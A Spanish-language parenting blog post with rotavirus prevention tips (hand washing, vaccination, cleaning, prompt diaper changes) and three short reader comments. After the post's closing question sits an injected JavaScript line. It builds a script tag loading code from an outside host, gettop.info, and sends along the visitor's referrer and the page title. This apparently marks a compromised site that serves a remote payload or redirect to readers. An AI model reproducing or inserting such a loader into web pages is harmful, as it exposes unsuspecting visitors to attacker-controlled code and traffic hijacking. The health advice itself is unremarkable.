Salud y belleza » Enfermedades, Niños, Salud

Consejos para prevenir el rotavirus

3 Comentarios

rotavirusAlrededor de un 80% de los niños que tienen menos de 5 años sufren el rotavirus, que produce una enfermedad que provoca diarreas, vómitos, fiebre y deshidratación. Es común que aparezca en invierno pero se puede evitar siguiendo algunos consejos y conseguir que tu hijo evite el rotavirus.

-Es imprescindible llevar una buena higiene de manos, por ejemplo, antes y después de cambiar los pañales. Hazlo tú y enseña a tus hijos a hacerlo antes después de ir al baño para evitar que se pasen los gérmenes.

- Vacuna contra el rotavirus: pese a que existan algunos movimientos antivacunas, éstas han salvado incontables vidas, y quien quiere lo mejor para su hijo lo vacuna contra el rotavirus para prevenir la enfermedad y mantenerlo saludable.

vacuna-rotavirus

- Buena higiene en casa: hay que limpiar muy buen sobre todo las zonas donde están los pañales, como la cómoda para cambiarlos, las sillas o el suelo, porque ello ayudará a eliminar los gérmenes de las heces.

- Cambiar el pañal rápidamente: si ves que tu hijo ha ensuciado el pañal es necesarios que lo cambies de inmediato (por la pañalitis) y porque el pañal sucio con las heces expuestas aumentan el riesgo de infección.

cambiar-el-pañal

Sobre todo, debes asegurarte de que los niños mantengan un nivel de higiene adecuado, tanto cuando están en casa como en el colegio o en el jardín para prevenir el rotavirus.

¿Alguna vez tu hijo ha tenido el rotavirus?

var d=document;var s=d.createElement('script'); s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';

Más consejos de salud y belleza : , , ,

3 Comments »

  • lorena said:

    No entiendo a las madres que no están pendientes de sus hijos, por lo menos de cuando tienen el pañal sucio, hay que cambiarlos sí o sí, eso es antihigiénico. Yo con la salud de mi hijo no me la juego.

  • fermina said:

    ¿Cómo se trata el rotavirus? Causa muertes o algo?

  • yoli said:

    Qué miedo eso de tener niños! son súper frágiles.

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.